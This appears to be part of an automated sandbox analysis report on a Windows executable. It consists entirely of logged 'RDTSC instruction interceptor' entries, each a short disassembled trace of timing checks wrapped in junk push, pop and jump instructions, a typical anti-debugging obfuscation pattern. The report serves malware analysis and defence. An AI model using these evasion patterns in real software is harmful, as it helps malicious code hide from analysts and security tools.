                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430347 second address: 543038E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ECh 0x00000005 mov ecx, 725130C7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FE75AF76777h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov di, D7EAh 0x0000001a pushfd 0x0000001b jmp 00007FE6E8F184BBh 0x00000020 adc esi, 184FF88Eh 0x00000026 jmp 00007FE6E8F184C9h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 543038E second address: 5430407 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE6E8B29097h 0x00000008 call 00007FE6E8B29098h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000018 pushad 0x00000019 movsx edi, ax 0x0000001c pushfd 0x0000001d jmp 00007FE6E8B29098h 0x00000022 or eax, 246507C8h 0x00000028 jmp 00007FE6E8B2908Bh 0x0000002d popfd 0x0000002e popad 0x0000002f je 00007FE75AB872B6h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430407 second address: 543040B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 543040B second address: 5430411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430411 second address: 543045A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007FE6E8F184C0h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FE6E8F184BEh 0x0000001b xor si, BC88h 0x00000020 jmp 00007FE6E8F184BBh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 mov dl, ch 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 543045A second address: 5430473 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test edx, 61000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE6E8B2908Ah 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430473 second address: 54304E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FE75AF766C0h 0x00000011 jmp 00007FE6E8F184C9h 0x00000016 test byte ptr [esi+48h], 00000001h 0x0000001a pushad 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FE6E8F184C6h 0x00000022 jmp 00007FE6E8F184C5h 0x00000027 popfd 0x00000028 mov bx, si 0x0000002b popad 0x0000002c popad 0x0000002d jne 00007FE75AF76682h 0x00000033 pushad 0x00000034 mov dh, ah 0x00000036 push eax 0x00000037 push edx 0x00000038 movsx edx, si 0x0000003b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54304E3 second address: 5430505 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test bl, 00000007h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE6E8B29095h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5420830 second address: 54208D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov cx, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f mov ax, 0EC5h 0x00000013 mov dl, cl 0x00000015 popad 0x00000016 pushfd 0x00000017 jmp 00007FE6E8F184C7h 0x0000001c sbb ax, 7E6Eh 0x00000021 jmp 00007FE6E8F184C9h 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esp], ebp 0x0000002b jmp 00007FE6E8F184BEh 0x00000030 mov ebp, esp 0x00000032 jmp 00007FE6E8F184C0h 0x00000037 and esp, FFFFFFF8h 0x0000003a pushad 0x0000003b mov ecx, 7A7775ADh 0x00000040 mov ax, BFA9h 0x00000044 popad 0x00000045 xchg eax, ebx 0x00000046 jmp 00007FE6E8F184C4h 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FE6E8F184BEh 0x00000053 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54208D5 second address: 54208E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B2908Eh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54208E7 second address: 542097B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a mov eax, edx 0x0000000c call 00007FE6E8F184C9h 0x00000011 mov edx, eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FE6E8F184C6h 0x0000001d sbb ah, FFFFFF98h 0x00000020 jmp 00007FE6E8F184BBh 0x00000025 popfd 0x00000026 mov bl, ah 0x00000028 popad 0x00000029 mov dword ptr [esp], esi 0x0000002c jmp 00007FE6E8F184BBh 0x00000031 mov esi, dword ptr [ebp+08h] 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FE6E8F184BBh 0x0000003d sbb ah, 0000000Eh 0x00000040 jmp 00007FE6E8F184C9h 0x00000045 popfd 0x00000046 push ecx 0x00000047 pop ebx 0x00000048 popad 0x00000049 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 542097B second address: 5420994 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5420994 second address: 5420998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5420998 second address: 54209B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29094h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54209B0 second address: 54209F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FE6E8F184BBh 0x00000014 sub eax, 0561F42Eh 0x0000001a jmp 00007FE6E8F184C9h 0x0000001f popfd 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54209F3 second address: 5420A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FE75AB8EA19h 0x0000000e pushad 0x0000000f mov dx, cx 0x00000012 mov esi, 4DECE343h 0x00000017 popad 0x00000018 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001f jmp 00007FE6E8B29096h 0x00000024 mov ecx, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FE6E8B29097h 0x0000002d rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5420A43 second address: 5420A6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FE75AF7DDF9h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop edi 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5420A6B second address: 5420AB8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE6E8B29096h 0x00000008 sub al, FFFFFFF8h 0x0000000b jmp 00007FE6E8B2908Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 test byte ptr [77516968h], 00000002h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FE6E8B29097h 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5420AB8 second address: 5420AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5420AD5 second address: 5420B1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FE75AB8E952h 0x0000000f jmp 00007FE6E8B2908Eh 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FE6E8B29097h 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5420B1A second address: 5420BE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FE6E8F184BEh 0x0000000f push eax 0x00000010 jmp 00007FE6E8F184BBh 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FE6E8F184C4h 0x0000001d adc ax, 0238h 0x00000022 jmp 00007FE6E8F184BBh 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b mov cx, 0E67h 0x0000002f mov ecx, 44932A03h 0x00000034 popad 0x00000035 push eax 0x00000036 pushad 0x00000037 mov ebx, 4FCB2E0Ah 0x0000003c jmp 00007FE6E8F184BBh 0x00000041 popad 0x00000042 xchg eax, ebx 0x00000043 jmp 00007FE6E8F184C6h 0x00000048 push dword ptr [ebp+14h] 0x0000004b jmp 00007FE6E8F184C0h 0x00000050 push dword ptr [ebp+10h] 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007FE6E8F184C7h 0x0000005a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430E14 second address: 5430E34 instructions: 0x00000000 rdtsc 0x00000002 mov cl, C8h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 jmp 00007FE6E8B2908Ah 0x0000000e mov bx, cx 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430E34 second address: 5430E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430E38 second address: 5430E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430E3E second address: 5430E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430E44 second address: 5430E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430E48 second address: 5430E4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430B51 second address: 5430B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430B57 second address: 5430B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430B5B second address: 5430BA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE6E8B29097h 0x00000012 sub ecx, 02722D6Eh 0x00000018 jmp 00007FE6E8B29099h 0x0000001d popfd 0x0000001e mov ebx, eax 0x00000020 popad 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430BA2 second address: 5430BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430BA8 second address: 5430BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430BAC second address: 5430BBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c movsx ebx, si 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ch, 00h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5430BBF second address: 5430C1A instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE6E8B29095h 0x00000008 or ecx, 5B8CDF06h 0x0000000e jmp 00007FE6E8B29091h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a jmp 00007FE6E8B2908Ch 0x0000001f mov ebx, ecx 0x00000021 popad 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FE6E8B29093h 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A0EC7 second address: 54A0EE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 movzx ecx, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE6E8F184BFh 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A0EE5 second address: 54A0EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B29094h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A0EFD second address: 54A0F01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A0F01 second address: 54A0F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE6E8B29099h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A0F29 second address: 54A0F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A0F2D second address: 54A0F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A0F33 second address: 54A0F72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FE6E8F184C0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov dl, E9h 0x00000016 jmp 00007FE6E8F184C6h 0x0000001b popad 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A0337 second address: 54A033B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A033B second address: 54A0341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A0341 second address: 54A0347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A0347 second address: 54A039C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FE6E8F184C6h 0x00000010 jmp 00007FE6E8F184C5h 0x00000015 popfd 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov bx, si 0x0000001d mov ebx, ecx 0x0000001f popad 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FE6E8F184C1h 0x00000028 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A01B6 second address: 54A0207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE6E8B29099h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007FE6E8B2908Ah 0x00000019 add si, B878h 0x0000001e jmp 00007FE6E8B2908Bh 0x00000023 popfd 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 544021D second address: 5440232 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440232 second address: 544024E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29091h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 544024E second address: 5440252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440252 second address: 5440258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5440258 second address: 544025E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A059E second address: 54A05BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29095h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A05BF second address: 54A05C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A05C3 second address: 54A05C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A05C7 second address: 54A062B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FE6E8F184C6h 0x0000000c sub ecx, 4BF33D68h 0x00000012 jmp 00007FE6E8F184BBh 0x00000017 popfd 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007FE6E8F184C6h 0x00000020 push dword ptr [ebp+0Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FE6E8F184C7h 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54A062B second address: 54A06C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007FE6E8B2908Bh 0x0000000c xor ah, FFFFFFBEh 0x0000000f jmp 00007FE6E8B29099h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push dword ptr [ebp+08h] 0x0000001b jmp 00007FE6E8B2908Eh 0x00000020 push C19E2DE7h 0x00000025 pushad 0x00000026 jmp 00007FE6E8B29097h 0x0000002b jmp 00007FE6E8B29098h 0x00000030 popad 0x00000031 add dword ptr [esp], 3E62D21Bh 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FE6E8B29097h 0x0000003f rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4ED097 second address: 4ED0A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE6E8F184B6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5450673 second address: 545068B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE6E8B2908Fh 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 545068B second address: 54506A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8F184C4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54506A3 second address: 54506CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE6E8B29095h 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54507DE second address: 54507E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54507E2 second address: 54507E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54507E8 second address: 54507EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54507EE second address: 54507F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54507F2 second address: 545083F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE6E8F184BEh 0x00000013 sbb cx, 7A08h 0x00000018 jmp 00007FE6E8F184BBh 0x0000001d popfd 0x0000001e mov eax, 61D3A87Fh 0x00000023 popad 0x00000024 push eax 0x00000025 pushad 0x00000026 mov edx, 0EBBDA76h 0x0000002b mov bl, 28h 0x0000002d popad 0x0000002e nop 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 545083F second address: 5450843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5450843 second address: 5450849 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5450849 second address: 5450887 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 1Ch 0x0000000c pushad 0x0000000d call 00007FE6E8B2908Eh 0x00000012 movzx ecx, dx 0x00000015 pop edx 0x00000016 mov si, 64E3h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FE6E8B29090h 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5450887 second address: 545088D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 545088D second address: 5450893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5450893 second address: 5450897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5450897 second address: 545089B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
